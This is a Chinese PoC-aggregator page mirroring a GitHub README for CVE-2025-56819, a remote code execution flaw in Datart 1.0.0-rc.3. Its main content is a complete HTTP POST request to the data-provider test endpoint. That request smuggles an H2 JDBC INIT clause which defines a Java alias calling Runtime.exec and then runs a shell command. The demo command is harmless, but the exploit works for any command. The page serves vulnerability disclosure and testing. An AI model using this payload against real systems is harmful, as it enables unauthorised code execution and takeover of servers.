POC详情: 708818b7bdd9670da102d0de5b3372aeb06ca5c9

来源
https://github.com/xyyzxc/CVE-2025-56819
关联漏洞
标题: datart 安全漏洞 (CVE-2025-56819)
描述:datart是running-elephant开源的一个数据可视化开放平台。 datart 1.0.0-rc.3版本存在安全漏洞,该漏洞源于INIT连接参数处理不当,可能导致执行任意代码。
描述
An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute  arbitrary code via the INIT connection parameter.
介绍
# CVE-2025-56819
An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute  arbitrary code via the INIT connection parameter.

```
 POST /api/v1/data-provider/test HTTP/1.1
 Host: test.com:8080
 Content-Type: application/json
 Content-Length: 520

 {
   "name": "jdbc-data-provider",
   "type": "JDBC",
   "properties": {
     "dbType": "H2",
     "url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('touch /tmp/test1')\\;",
     "user": null,
     "password": "",
     "driverClass": "org.h2.Driver",
     "serverAggregate": false,
     "enableSpecialSQL": false,
     "enableSyncSchemas": true,
     "syncInterval": "60",
     "properties": {}
   }
 }
```
文件快照

 [4.0K]  /data/pocs/708818b7bdd9670da102d0de5b3372aeb06ca5c9
└── [ 798]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。